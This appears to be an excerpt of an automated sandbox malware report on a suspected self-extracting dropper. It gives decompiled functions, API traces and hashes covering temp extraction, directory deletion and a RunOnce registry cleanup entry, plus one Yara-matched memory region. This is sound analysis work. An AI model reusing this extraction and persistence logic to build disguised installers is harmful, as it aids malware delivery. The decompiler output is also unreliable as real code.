Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-58291647
Opcode ID: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
Instruction ID: dd7a2d248aebac99f1714a49481474325bfd39d927ddb191d2ee86f43da6afaf
Opcode Fuzzy Hash: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
Instruction Fuzzy Hash: 9641A270B012059BDB20AF769E4965B3BAC9B44755F10007FA941F26D6EB7C8E80CE6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00405467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x408004; // 0xee8c6708
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x4091e4;
					_t42 = 0x104;
					E00401680(0x4091e4, 0x104);
					L14:
					_t13 = E004058C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x409124 = 0;
							_t14 = 1;
							L24:
							return E00406CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0040597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x408a20; // 0x0
						if(_t61 != 0) {
							 *0x408a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x409124 = E00406285();
						goto L22;
					}
					 *0x408a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E004053A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x4091e4;
				E00401781(0x4091e4, 0x104, __ecx,  &_v268);
				if(( *0x409a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0040658A(_t48, 0x104, 0x401140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0040658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00405472
0x00405479
0x00405481
0x00405484
0x0040551c
0x00405521
0x00405528
0x0040552d
0x0040552f
0x00405539
0x0040554d
0x0040554d
0x00405552
0x00405585
0x00405585
0x0040558b
0x0040558d
0x0040559d
0x0040559d
0x00405557
0x0040555e
0x00000000
0x00000000
0x00405560
0x00405566
0x00405569
0x0040556f
0x0040556f
0x00405581
0x00405581
0x00000000
0x00405581
0x00405545
0x0040557c
0x00000000
0x0040557c
0x00405547
0x00000000
0x00405547
0x0040548a
0x00405490
0x00405497
0x00000000
0x00000000
0x0040549d
0x004054ab
0x004054b4
0x004054c0
0x0040550c
0x00405511
0x00405515
0x00000000
0x00405515
0x004054c9
0x004054d6
0x004054d8
0x004054fe
0x00405503
0x00405507
0x00000000
0x00405507
0x004054da
0x004054dd
0x004054f7
0x00000000
0x004054f7
0x004054df
0x004054e2
0x004054f0
0x00000000
0x004054f0
0x004054e7
0x00000000
0x00000000
0x004054e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004054C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040556F

Part of subcall function 004053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
Part of subcall function 004053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
Part of subcall function 004053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
Part of subcall function 004053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
Part of subcall function 004053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434

Strings

i386, xrefs: 004054FE
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 0040547D, 00405481, 004054AB, 0040551C, 0040553C, 00405568
mips, xrefs: 004054F7
alpha, xrefs: 004054F0
ppc, xrefs: 004054E9

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-186922987
Opcode ID: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
Instruction ID: 42d8508e497298c23007889095531b712f90f8dafbad6872354eea9b701dc3d5
Opcode Fuzzy Hash: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
Instruction Fuzzy Hash: EA313A70700A047BDB105F2A9D04A7F77AAEB81304B14013FAC02F26E5DB7C8E028E8D

Uniqueness

Uniqueness Score: -1.00%

Function 00402390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00402390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x408004; // 0xee8c6708
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00406CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00401680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E004016B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00401680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E004016B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E004016B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0040658A( &_v280, 0x104, 0x401140);
								E00402390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00402398
0x0040239e
0x004023a3
0x004023a5
0x004023ae
0x004023b3
0x004024cb
0x004024d2
0x004024d3
0x004024d4
0x004024df
0x004023c2
0x004023d1
0x004023db
0x004023e4
0x004023f6
0x004023fc
0x00402401
0x00000000
0x00000000
0x00000000
0x00000000
0x00402407
0x00402407
0x00402408
0x00402411
0x0040241f
0x0040247a
0x00402483
0x00402495
0x004024a3
0x00402421
0x0040242f
0x00402453
0x0040245d
0x00402466
0x00402472
0x00402472
0x0040242f
0x004024af
0x004024b5
0x004024be
0x004024c5
0x00000000
0x004024c5

APIs

FindFirstFileA.KERNELBASE(?,00408A3A,004011F4,00408A3A,00000000,?,?), ref: 004023F6
lstrcmpA.KERNEL32(?,004011F8), ref: 00402427
lstrcmpA.KERNEL32(?,004011FC), ref: 0040243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00402495
DeleteFileA.KERNEL32(?), ref: 004024A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 004024AF
FindClose.KERNELBASE(00000000), ref: 004024BE
RemoveDirectoryA.KERNELBASE(00408A3A), ref: 004024C5

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
Instruction ID: 49d887b1e5617c187f2e1a2157473020d0f6751303a448a4b2a9eeaf758e879d
Opcode Fuzzy Hash: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
Instruction Fuzzy Hash: E6318131604744ABC320DF64CE8DEEB73ACABC4309F14493FB555A62D0EB7C9909875A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00402BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x40a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x409124 = 0;
				if(E00402CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00402F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E004052B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x408a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x409a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00401F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x408588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x409124; // 0x80070002
				return _t7;
			}

0x00402c03
0x00402c0d
0x00402c18
0x00402c20
0x00402c2e
0x00402c32
0x00402c36
0x00402c3d
0x00402c43
0x00402c45
0x00402c47
0x00402c49
0x00402c4e
0x00402c4e
0x00402c47
0x00402c32
0x00402c20
0x00402c50
0x00402c54
0x00402c57
0x00402c64
0x00402c66
0x00402c6b
0x00402c6d
0x00402c74
0x00402c76
0x00402c7c
0x00402c7e
0x00402c87
0x00402c89
0x00402c89
0x00402c87
0x00402c7c
0x00402c74
0x00402c8e
0x00402c95
0x00402c98
0x00402c98
0x00402c9e
0x00402ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00402C28
CloseHandle.KERNEL32(00000000,?,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C98

Strings

Kernel32.dll, xrefs: 00402C13
HeapSetInformation, xrefs: 00402C22

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
Instruction ID: 373ad44501aeb887ed01a9fdf89c2162dac343eefee69ca1e043016b058be2d5
Opcode Fuzzy Hash: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
Instruction Fuzzy Hash: 00118C312043166BF7207BA5AF8CA6B37599B88394B04403AB940B72E1DAB8DC418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 068807C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 068807EE
Module32First.KERNEL32(00000000,00000224), ref: 0688080E

Memory Dump Source

Source File: 00000000.00000002.341440182.0000000006880000.00000040.00000020.00020000.00000000.sdmp, Offset: 06880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6880000_SzznpUhIjo.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 85fb23c08a5eec48c59ccf2b324c3b73b861bb0a93d6e8a827858ec55a4e4df0
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 78F096316007146FD7603BF9AC8DB6F76F8EF89725F100528E642D10C0DB70E849CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0040202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x408004; // 0xee8c6708
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00406CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0040171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0040658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x409a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x4091e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x4091e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x4091e5);
						if(_t90 != 0) {
							 *0x408580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E0040171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E004044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0040658A( &_v268, 0x104, 0x401140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x408530 = _t66;
				goto L23;
			}

0x0040202a
0x00402035
0x0040203c
0x00402041
0x00402050
0x0040205f
0x00402064
0x0040206f
0x0040208c
0x00402094
0x00402257
0x00402266
0x00402266
0x0040209a
0x0040209b
0x0040209d
0x004020aa
0x004020af
0x004020c9
0x004020d1
0x00000000
0x00000000
0x004020d3
0x004020da
0x00000000
0x00000000
0x00000000
0x004020da
0x004020e2
0x00402103
0x0040210e
0x00402116
0x00402122
0x00402128
0x0040212c
0x00402179
0x00402194
0x004021de
0x004021e4
0x00402256
0x00402256
0x00000000
0x00402256
0x00402196
0x00402196
0x0040219c
0x0040219f
0x0040219f
0x004021a1
0x004021a2
0x004021a6
0x004021a8
0x004021b0
0x004021b0
0x004021b2
0x004021b3
0x004021bc
0x004021c7
0x004021cb
0x004021f1
0x004021f6
0x004021fd
0x004021ff
0x004021ff
0x00402204
0x00402213
0x00402218
0x0040221d
0x0040221d
0x00402220
0x00402220
0x00402222
0x00402223
0x00402229
0x0040223d
0x00402249
0x00402250
0x00000000
0x00402250
0x004021d2
0x004021d9
0x00000000
0x004021d9
0x0040213a
0x00402141
0x00402144
0x0040214c
0x00000000
0x00000000
0x00402163
0x00402172
0x00402172
0x00000000
0x00402163
0x004020ea
0x004020f0
0x00000000

APIs

memset.MSVCRT ref: 00402050
memset.MSVCRT ref: 0040205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040208C

Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020EA
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00402134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402144
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0040218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402250

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004021A8, 00402204
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 004021F6
%s /D:%s, xrefs: 004021FF, 00402210
DelNodeRunDLL32, xrefs: 0040212E
wextract_cleanup%d, xrefs: 0040209E
advpack.dll, xrefs: 00402109
wextract_cleanup0, xrefs: 004020A5, 004020BE, 004020F0, 00402232
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00402082

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-3765599613
Opcode ID: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
Instruction ID: abd05bcecfda372187b57d735bcaea41b16cf637c922aa78c443ab609978b97c
Opcode Fuzzy Hash: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
Instruction Fuzzy Hash: E1510671A00218ABDB209F60DE4DFEB777CEB44700F0041BAFA49F71D1DAB89D498A58

Uniqueness

Uniqueness Score: -1.00%

Function 004055A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E004055A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x408004; // 0xee8c6708
				_v8 = _t28 ^ _t110;
				_t2 = E0040468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0040468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x409a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x408b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x408a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00406517(_t82, 0x7d2, 0, E00403210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x409a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x4091e4;
									_t40 = GetTempPathA(0x104, 0x4091e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00401781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00406952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0040597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00402630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0040658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x4091e4;
																					E00401781(0x4091e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00405467(0x4091e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00402630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0040597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00405467(0x4091e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x4091e4;
											_t70 = E00402630(0, 0x4091e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x4091e4;
												_t71 = E00405467(0x4091e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
